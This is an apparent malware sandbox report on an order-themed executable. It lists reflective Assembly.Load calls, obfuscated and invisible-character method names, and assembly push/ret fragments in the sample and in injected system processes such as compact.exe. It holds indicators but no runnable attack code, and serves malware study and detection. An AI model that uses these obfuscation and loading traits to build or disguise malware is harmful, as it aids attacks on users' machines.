Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: spec 4008670601 AZTEK Order.exe, mainscreen.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.spec 4008670601 AZTEK Order.exe.6eb0000.4.raw.unpack, -Module-.cs	.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.spec 4008670601 AZTEK Order.exe.6eb0000.4.raw.unpack, PingPong.cs	.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	.Net Code: ReEpk3am4R System.Reflection.Assembly.Load(byte[])
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	.Net Code: ReEpk3am4R System.Reflection.Assembly.Load(byte[])
Source: 0.2.spec 4008670601 AZTEK Order.exe.288c328.0.raw.unpack, -Module-.cs	.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.spec 4008670601 AZTEK Order.exe.288c328.0.raw.unpack, PingPong.cs	.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	.Net Code: ReEpk3am4R System.Reflection.Assembly.Load(byte[])
Source: 12.2.compact.exe.3d9cd08.2.raw.unpack, mainscreen.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 14.2.OFEkXEMCZC.exe.2c8cd08.1.raw.unpack, mainscreen.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 14.0.OFEkXEMCZC.exe.2c8cd08.1.raw.unpack, mainscreen.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 15.2.firefox.exe.26bbcd08.0.raw.unpack, mainscreen.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA6547 push ds; iretd	0_2_06DA654F
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA3AD7 push ebx; retf	0_2_06DA3ADA
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00402061 push es; iretd	6_2_00402076
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0040C158 push ecx; retf	6_2_0040C159
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_004021D9 push 77CEFDB6h; ret	6_2_004021E0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00417238 push ebx; retf	6_2_00417239
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00411AA5 push esp; iretd	6_2_00411AAB
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00411AB9 push 1CFC06C9h; ret	6_2_00411ABE
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00408300 push es; retf	6_2_0040831F
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_004033A0 push eax; ret	6_2_004033A2
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0040BC07 push ss; ret	6_2_0040BC09
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_004164C3 push ebp; retf 18B7h	6_2_00416449
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0040750F push ebp; retf	6_2_00407510
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_004125BB push esp; ret	6_2_004125CC
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00418F6C push cs; iretd	6_2_00418F71
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00413FE4 push 00000030h; iretd	6_2_00413FE9
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017A09AD push ecx; mov dword ptr [esp], ecx	6_2_017A09B6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_036D225F pushad ; ret	12_2_036D27F9
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_036D27FA pushad ; ret	12_2_036D27F9
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037009AD push ecx; mov dword ptr [esp], ecx	12_2_037009B6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_036D283D push eax; iretd	12_2_036D2858
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DD3120 push ebp; retf 18B7h	12_2_02DD30A6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DC416C push ebp; retf	12_2_02DC416D
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DCE716 push 1CFC06C9h; ret	12_2_02DCE71B
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DCE702 push esp; iretd	12_2_02DCE708
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DCE400 push esi; iretd	12_2_02DCE407
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DC8864 push ss; ret	12_2_02DC8866
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DC4F5D push es; retf	12_2_02DC4F7C
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DD0C41 push 00000030h; iretd	12_2_02DD0C46
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DC8DB5 push ecx; retf	12_2_02DC8DB6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DE2D10 pushfd ; retf	12_2_02DE2D88

Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, qA9RwWS5F6FWCWFdeB.cs	High entropy of concatenated method names: 'FlTmrOANRC', 'WECmX77WOl', 'ToString', 'SV4mUJYMnP', 'uxhmJl3V9R', 'YLTmKHXdT9', 'vEDm31VvQy', 'JkJmRaQDj1', 'qDLmq0jOSc', 'AlPmf2LUYj'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, LhKXYDnDrCC31IYC1l.cs	High entropy of concatenated method names: 'R4cJOAYNcS', 'YgSJWBRnUX', 'evHJx9oAe3', 'po6JSteB30', 'd2RJoyyN2q', 'Pw4JDiLgBu', 'KLiJ2UPpDc', 'nlCJEEXRVp', 'hpoJcScTW1', 'lZdJw1nbm9'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, eV9V7MD7jcQe67EKiX.cs	High entropy of concatenated method names: 'JvHmE5KpPe', 'glTmwpnVcW', 'Xs2iIQY4a7', 'VwKiPbQIQ7', 'Rs1m4iOMS7', 'e3emCoQkKu', 'y91mQMuKZ3', 'tLNmOw8VHX', 'EZomWV0A6m', 't98mxlHK31'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, ylQaofKffa4LIes7R5.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lCc1cEwMwj', 'jJc1wnYHRm', 'qAv1zT1f33', 'APetIRtgDe', 'hBstPBbNfG', 'LwKt1Ehcvv', 'U0Uttc3pKE', 'oHlEoL6GLIiVXjYAsJ7'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, XtCPEIPI0vwmxjU1yCT.cs	High entropy of concatenated method names: 'QojNh0xZdI', 'KtSNeTgyWP', 'J1cNkmDnrc', 'IpLNdIYI4O', 'yb4NGkTU3R', 'FnDNHwboah', 'i0QNbvL49o', 'SS8NnPUZKK', 'PrfNTAtIy4', 'ovtNFuubYc'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, pdbENd1sSmsdBwH33k.cs	High entropy of concatenated method names: 'htvkcm1cW', 't9ndSAATO', 'NdqHHyi4i', 'wJabu52bW', 'fPPT19gao', 'DLVFo7bST', 'A5jUqYDi5jrufkj4C8', 'nc0XIWRIbcPoBO0RsU', 'R8hZtxpOtPGcYB5cWU', 'm9liiXFpk'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, lQu5AaJnCEQNfsoTrX.cs	High entropy of concatenated method names: 'Dispose', 'SjpPc5TKLg', 'mJR1sVmfeQ', 'zJXffgd7bH', 'rD9PwPtclR', 'dC4PzX1BqT', 'ProcessDialogKey', 'UyG1ISsJEh', 'Bdl1PS5HkG', 'PDT11Ahfxh'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, tbwg0rTy7Rm4lPvbFt.cs	High entropy of concatenated method names: 'svLKdyeQl3', 'b0nKHB1jeD', 'DhjKngmTFd', 'eHBKT4f482', 'k4CKBBPMiw', 'aQ2KvITvkX', 'y4RKmrBkDT', 'ipTKiR2VoU', 'txOKNVw479', 'Jp5K0ZUkYF'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, Dra8tFQfXTtjhUEabr.cs	High entropy of concatenated method names: 'prDgnyK5UO', 'i7QgTbg8Qj', 'RhcglyGOlM', 'fDcgsv8m9T', 'bNlgAh5rFh', 'kGOg61g2Sw', 'M5ugZHgt5t', 'yNKguR8ihO', 'tlBgyruPUK', 'RUPg41hsLF'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, zgFrk5lnN0batYPMjA.cs	High entropy of concatenated method names: 'yG1R5vUfow', 'sSDRJooOeh', 'JuoR3aQ2k4', 'xDrRqK4sfJ', 'kJlRffYJrK', 'EIK3oBi8aO', 'QXB3DUgcna', 'Yk732KGW77', 'jHo3EYVNYX', 'DDT3cS8f2P'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	High entropy of concatenated method names: 'Lhkt50BnTe', 'fm5tUJUIgf', 'pB7tJqeovL', 'nmttK4RPu1', 'VwAt32QsZg', 'nvRtR9CMEi', 'K4JtqiDJU0', 'N4LtfnrjPU', 'QFMtVYLYDk', 'PUetrfaAxs'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, V9PtclERpC4X1BqTDy.cs	High entropy of concatenated method names: 'zlJiUTq9mm', 'QRTiJIZijr', 'HH4iKfqR5U', 'etsi3CfVuT', 'qKdiRVihU2', 'yoAiqywsJB', 'uQRifqd9M1', 'Ds3iVwTGX4', 'MRFir7qI7x', 'yPkiXPTmkB'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, suymARO42b2OJQh7HL.cs	High entropy of concatenated method names: 'SgtByHPyMM', 'sc3BCa3DL5', 'gw1BO5mKhI', 'zc6BWw5rB2', 'K1UBsww97X', 'oapBYj08tX', 'Yi1BA313Nm', 'WpDB6lkKVc', 'Uw7B8KmsS4', 'hpVBZjTYUl'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, QM8C5hZiKlLbJdDmtr.cs	High entropy of concatenated method names: 'RlcqU2f37u', 'cXLqKYJdwS', 'Fr7qRCTA5j', 'EZbRw8VO6M', 'ICRRzIsa5l', 'F1bqIoMBmb', 'LshqPVDfj7', 'W9oq1gN2Sr', 'QwCqt25MK6', 'm3fqpag7y3'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, BSsJEhcGdlS5HkGCDT.cs	High entropy of concatenated method names: 'lONillSj2l', 'j01isx4a9G', 'tnoiYXDeuF', 'XnZiA97QnA', 'sV3iOylteT', 'EgUi6tCbkb', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, dB7d8mFu5eUU8getxb.cs	High entropy of concatenated method names: 'Tcu3GYEDkC', 'bG83bWvdmX', 'VIHKY4EQp0', 'G6gKAaPYBJ', 'WrHK6oclEa', 'JJIK8COS25', 'aYQKZ1iAqV', 'LAOKuUOTst', 'GewK7XJ3bR', 'eA5Kyk5hZV'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, Jhfxhhw7tJ6PfM1FNn.cs	High entropy of concatenated method names: 'iIANPlssTI', 'HSENtVjiQ7', 'yMENpUt7KJ', 'UWPNU3V7xl', 'WRrNJlD5NZ', 'qOfN3jWWDe', 'ewfNRNbvXO', 'GDSi2cdQgJ', 'dXZiEKpoey', 'lncic0yNnP'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, LMx5uOpTP1v1ft95hN.cs	High entropy of concatenated method names: 'weZPqhKXYD', 'VrCPfC31IY', 'my7PrRm4lP', 'pbFPXttB7d', 'netPBxbkgF', 'mk5PvnN0ba', 'drT0eWmXUAGwcTO4Ke', 'etuNcYTpLcZdhdIFSO', 'UvZPP8mpuD', 'xOXPtmMpUP'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, plyn4AzrwpREROgjZj.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'desNg4WXyt', 'fQ1NBiPAkp', 'KCENvrmL82', 'AHGNmlqbTn', 'ruuNiM8eXV', 'ophNNtZ71I', 'B4lN01l2BA'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, IJHR3K72f7raiuBq1W.cs	High entropy of concatenated method names: 'QfYqhUImDQ', 'xwVqesdrdf', 'IY8qkc2h1P', 'iyWqdpc3hZ', 'asPqGZnpk2', 'C26qHxpaH4', 'HwpqbG3oqH', 'smuqn2jKet', 'otuqTaTVbj', 'YIuqFT66hX'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, qA9RwWS5F6FWCWFdeB.cs	High entropy of concatenated method names: 'FlTmrOANRC', 'WECmX77WOl', 'ToString', 'SV4mUJYMnP', 'uxhmJl3V9R', 'YLTmKHXdT9', 'vEDm31VvQy', 'JkJmRaQDj1', 'qDLmq0jOSc', 'AlPmf2LUYj'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, LhKXYDnDrCC31IYC1l.cs	High entropy of concatenated method names: 'R4cJOAYNcS', 'YgSJWBRnUX', 'evHJx9oAe3', 'po6JSteB30', 'd2RJoyyN2q', 'Pw4JDiLgBu', 'KLiJ2UPpDc', 'nlCJEEXRVp', 'hpoJcScTW1', 'lZdJw1nbm9'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, eV9V7MD7jcQe67EKiX.cs	High entropy of concatenated method names: 'JvHmE5KpPe', 'glTmwpnVcW', 'Xs2iIQY4a7', 'VwKiPbQIQ7', 'Rs1m4iOMS7', 'e3emCoQkKu', 'y91mQMuKZ3', 'tLNmOw8VHX', 'EZomWV0A6m', 't98mxlHK31'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, ylQaofKffa4LIes7R5.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lCc1cEwMwj', 'jJc1wnYHRm', 'qAv1zT1f33', 'APetIRtgDe', 'hBstPBbNfG', 'LwKt1Ehcvv', 'U0Uttc3pKE', 'oHlEoL6GLIiVXjYAsJ7'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, XtCPEIPI0vwmxjU1yCT.cs	High entropy of concatenated method names: 'QojNh0xZdI', 'KtSNeTgyWP', 'J1cNkmDnrc', 'IpLNdIYI4O', 'yb4NGkTU3R', 'FnDNHwboah', 'i0QNbvL49o', 'SS8NnPUZKK', 'PrfNTAtIy4', 'ovtNFuubYc'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, pdbENd1sSmsdBwH33k.cs	High entropy of concatenated method names: 'htvkcm1cW', 't9ndSAATO', 'NdqHHyi4i', 'wJabu52bW', 'fPPT19gao', 'DLVFo7bST', 'A5jUqYDi5jrufkj4C8', 'nc0XIWRIbcPoBO0RsU', 'R8hZtxpOtPGcYB5cWU', 'm9liiXFpk'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, lQu5AaJnCEQNfsoTrX.cs	High entropy of concatenated method names: 'Dispose', 'SjpPc5TKLg', 'mJR1sVmfeQ', 'zJXffgd7bH', 'rD9PwPtclR', 'dC4PzX1BqT', 'ProcessDialogKey', 'UyG1ISsJEh', 'Bdl1PS5HkG', 'PDT11Ahfxh'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, tbwg0rTy7Rm4lPvbFt.cs	High entropy of concatenated method names: 'svLKdyeQl3', 'b0nKHB1jeD', 'DhjKngmTFd', 'eHBKT4f482', 'k4CKBBPMiw', 'aQ2KvITvkX', 'y4RKmrBkDT', 'ipTKiR2VoU', 'txOKNVw479', 'Jp5K0ZUkYF'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, Dra8tFQfXTtjhUEabr.cs	High entropy of concatenated method names: 'prDgnyK5UO', 'i7QgTbg8Qj', 'RhcglyGOlM', 'fDcgsv8m9T', 'bNlgAh5rFh', 'kGOg61g2Sw', 'M5ugZHgt5t', 'yNKguR8ihO', 'tlBgyruPUK', 'RUPg41hsLF'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, zgFrk5lnN0batYPMjA.cs	High entropy of concatenated method names: 'yG1R5vUfow', 'sSDRJooOeh', 'JuoR3aQ2k4', 'xDrRqK4sfJ', 'kJlRffYJrK', 'EIK3oBi8aO', 'QXB3DUgcna', 'Yk732KGW77', 'jHo3EYVNYX', 'DDT3cS8f2P'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	High entropy of concatenated method names: 'Lhkt50BnTe', 'fm5tUJUIgf', 'pB7tJqeovL', 'nmttK4RPu1', 'VwAt32QsZg', 'nvRtR9CMEi', 'K4JtqiDJU0', 'N4LtfnrjPU', 'QFMtVYLYDk', 'PUetrfaAxs'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, V9PtclERpC4X1BqTDy.cs	High entropy of concatenated method names: 'zlJiUTq9mm', 'QRTiJIZijr', 'HH4iKfqR5U', 'etsi3CfVuT', 'qKdiRVihU2', 'yoAiqywsJB', 'uQRifqd9M1', 'Ds3iVwTGX4', 'MRFir7qI7x', 'yPkiXPTmkB'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, suymARO42b2OJQh7HL.cs	High entropy of concatenated method names: 'SgtByHPyMM', 'sc3BCa3DL5', 'gw1BO5mKhI', 'zc6BWw5rB2', 'K1UBsww97X', 'oapBYj08tX', 'Yi1BA313Nm', 'WpDB6lkKVc', 'Uw7B8KmsS4', 'hpVBZjTYUl'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, QM8C5hZiKlLbJdDmtr.cs	High entropy of concatenated method names: 'RlcqU2f37u', 'cXLqKYJdwS', 'Fr7qRCTA5j', 'EZbRw8VO6M', 'ICRRzIsa5l', 'F1bqIoMBmb', 'LshqPVDfj7', 'W9oq1gN2Sr', 'QwCqt25MK6', 'm3fqpag7y3'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, BSsJEhcGdlS5HkGCDT.cs	High entropy of concatenated method names: 'lONillSj2l', 'j01isx4a9G', 'tnoiYXDeuF', 'XnZiA97QnA', 'sV3iOylteT', 'EgUi6tCbkb', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, dB7d8mFu5eUU8getxb.cs	High entropy of concatenated method names: 'Tcu3GYEDkC', 'bG83bWvdmX', 'VIHKY4EQp0', 'G6gKAaPYBJ', 'WrHK6oclEa', 'JJIK8COS25', 'aYQKZ1iAqV', 'LAOKuUOTst', 'GewK7XJ3bR', 'eA5Kyk5hZV'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, Jhfxhhw7tJ6PfM1FNn.cs	High entropy of concatenated method names: 'iIANPlssTI', 'HSENtVjiQ7', 'yMENpUt7KJ', 'UWPNU3V7xl', 'WRrNJlD5NZ', 'qOfN3jWWDe', 'ewfNRNbvXO', 'GDSi2cdQgJ', 'dXZiEKpoey', 'lncic0yNnP'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, LMx5uOpTP1v1ft95hN.cs	High entropy of concatenated method names: 'weZPqhKXYD', 'VrCPfC31IY', 'my7PrRm4lP', 'pbFPXttB7d', 'netPBxbkgF', 'mk5PvnN0ba', 'drT0eWmXUAGwcTO4Ke', 'etuNcYTpLcZdhdIFSO', 'UvZPP8mpuD', 'xOXPtmMpUP'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, plyn4AzrwpREROgjZj.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'desNg4WXyt', 'fQ1NBiPAkp', 'KCENvrmL82', 'AHGNmlqbTn', 'ruuNiM8eXV', 'ophNNtZ71I', 'B4lN01l2BA'
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, IJHR3K72f7raiuBq1W.cs	High entropy of concatenated method names: 'QfYqhUImDQ', 'xwVqesdrdf', 'IY8qkc2h1P', 'iyWqdpc3hZ', 'asPqGZnpk2', 'C26qHxpaH4', 'HwpqbG3oqH', 'smuqn2jKet', 'otuqTaTVbj', 'YIuqFT66hX'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, qA9RwWS5F6FWCWFdeB.cs	High entropy of concatenated method names: 'FlTmrOANRC', 'WECmX77WOl', 'ToString', 'SV4mUJYMnP', 'uxhmJl3V9R', 'YLTmKHXdT9', 'vEDm31VvQy', 'JkJmRaQDj1', 'qDLmq0jOSc', 'AlPmf2LUYj'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, LhKXYDnDrCC31IYC1l.cs	High entropy of concatenated method names: 'R4cJOAYNcS', 'YgSJWBRnUX', 'evHJx9oAe3', 'po6JSteB30', 'd2RJoyyN2q', 'Pw4JDiLgBu', 'KLiJ2UPpDc', 'nlCJEEXRVp', 'hpoJcScTW1', 'lZdJw1nbm9'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, eV9V7MD7jcQe67EKiX.cs	High entropy of concatenated method names: 'JvHmE5KpPe', 'glTmwpnVcW', 'Xs2iIQY4a7', 'VwKiPbQIQ7', 'Rs1m4iOMS7', 'e3emCoQkKu', 'y91mQMuKZ3', 'tLNmOw8VHX', 'EZomWV0A6m', 't98mxlHK31'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, ylQaofKffa4LIes7R5.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lCc1cEwMwj', 'jJc1wnYHRm', 'qAv1zT1f33', 'APetIRtgDe', 'hBstPBbNfG', 'LwKt1Ehcvv', 'U0Uttc3pKE', 'oHlEoL6GLIiVXjYAsJ7'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, XtCPEIPI0vwmxjU1yCT.cs	High entropy of concatenated method names: 'QojNh0xZdI', 'KtSNeTgyWP', 'J1cNkmDnrc', 'IpLNdIYI4O', 'yb4NGkTU3R', 'FnDNHwboah', 'i0QNbvL49o', 'SS8NnPUZKK', 'PrfNTAtIy4', 'ovtNFuubYc'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, pdbENd1sSmsdBwH33k.cs	High entropy of concatenated method names: 'htvkcm1cW', 't9ndSAATO', 'NdqHHyi4i', 'wJabu52bW', 'fPPT19gao', 'DLVFo7bST', 'A5jUqYDi5jrufkj4C8', 'nc0XIWRIbcPoBO0RsU', 'R8hZtxpOtPGcYB5cWU', 'm9liiXFpk'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, lQu5AaJnCEQNfsoTrX.cs	High entropy of concatenated method names: 'Dispose', 'SjpPc5TKLg', 'mJR1sVmfeQ', 'zJXffgd7bH', 'rD9PwPtclR', 'dC4PzX1BqT', 'ProcessDialogKey', 'UyG1ISsJEh', 'Bdl1PS5HkG', 'PDT11Ahfxh'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, tbwg0rTy7Rm4lPvbFt.cs	High entropy of concatenated method names: 'svLKdyeQl3', 'b0nKHB1jeD', 'DhjKngmTFd', 'eHBKT4f482', 'k4CKBBPMiw', 'aQ2KvITvkX', 'y4RKmrBkDT', 'ipTKiR2VoU', 'txOKNVw479', 'Jp5K0ZUkYF'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, Dra8tFQfXTtjhUEabr.cs	High entropy of concatenated method names: 'prDgnyK5UO', 'i7QgTbg8Qj', 'RhcglyGOlM', 'fDcgsv8m9T', 'bNlgAh5rFh', 'kGOg61g2Sw', 'M5ugZHgt5t', 'yNKguR8ihO', 'tlBgyruPUK', 'RUPg41hsLF'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, zgFrk5lnN0batYPMjA.cs	High entropy of concatenated method names: 'yG1R5vUfow', 'sSDRJooOeh', 'JuoR3aQ2k4', 'xDrRqK4sfJ', 'kJlRffYJrK', 'EIK3oBi8aO', 'QXB3DUgcna', 'Yk732KGW77', 'jHo3EYVNYX', 'DDT3cS8f2P'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	High entropy of concatenated method names: 'Lhkt50BnTe', 'fm5tUJUIgf', 'pB7tJqeovL', 'nmttK4RPu1', 'VwAt32QsZg', 'nvRtR9CMEi', 'K4JtqiDJU0', 'N4LtfnrjPU', 'QFMtVYLYDk', 'PUetrfaAxs'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, V9PtclERpC4X1BqTDy.cs	High entropy of concatenated method names: 'zlJiUTq9mm', 'QRTiJIZijr', 'HH4iKfqR5U', 'etsi3CfVuT', 'qKdiRVihU2', 'yoAiqywsJB', 'uQRifqd9M1', 'Ds3iVwTGX4', 'MRFir7qI7x', 'yPkiXPTmkB'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, suymARO42b2OJQh7HL.cs	High entropy of concatenated method names: 'SgtByHPyMM', 'sc3BCa3DL5', 'gw1BO5mKhI', 'zc6BWw5rB2', 'K1UBsww97X', 'oapBYj08tX', 'Yi1BA313Nm', 'WpDB6lkKVc', 'Uw7B8KmsS4', 'hpVBZjTYUl'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, QM8C5hZiKlLbJdDmtr.cs	High entropy of concatenated method names: 'RlcqU2f37u', 'cXLqKYJdwS', 'Fr7qRCTA5j', 'EZbRw8VO6M', 'ICRRzIsa5l', 'F1bqIoMBmb', 'LshqPVDfj7', 'W9oq1gN2Sr', 'QwCqt25MK6', 'm3fqpag7y3'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, BSsJEhcGdlS5HkGCDT.cs	High entropy of concatenated method names: 'lONillSj2l', 'j01isx4a9G', 'tnoiYXDeuF', 'XnZiA97QnA', 'sV3iOylteT', 'EgUi6tCbkb', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, dB7d8mFu5eUU8getxb.cs	High entropy of concatenated method names: 'Tcu3GYEDkC', 'bG83bWvdmX', 'VIHKY4EQp0', 'G6gKAaPYBJ', 'WrHK6oclEa', 'JJIK8COS25', 'aYQKZ1iAqV', 'LAOKuUOTst', 'GewK7XJ3bR', 'eA5Kyk5hZV'
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, Jhfxhhw7tJ6PfM1FNn.cs	High entropy of concatenated method names: 'iIANPlssTI', 'HSENtVjiQ7', 'yMENpUt7KJ', 'UWPNU3V7xl', 'WRrNJlD5NZ', 'qOfN3jWWDe', 'ewfNRNbvXO', 'GDSi2cdQgJ', 'dXZiEKpoey', 'lncic0yNnP'
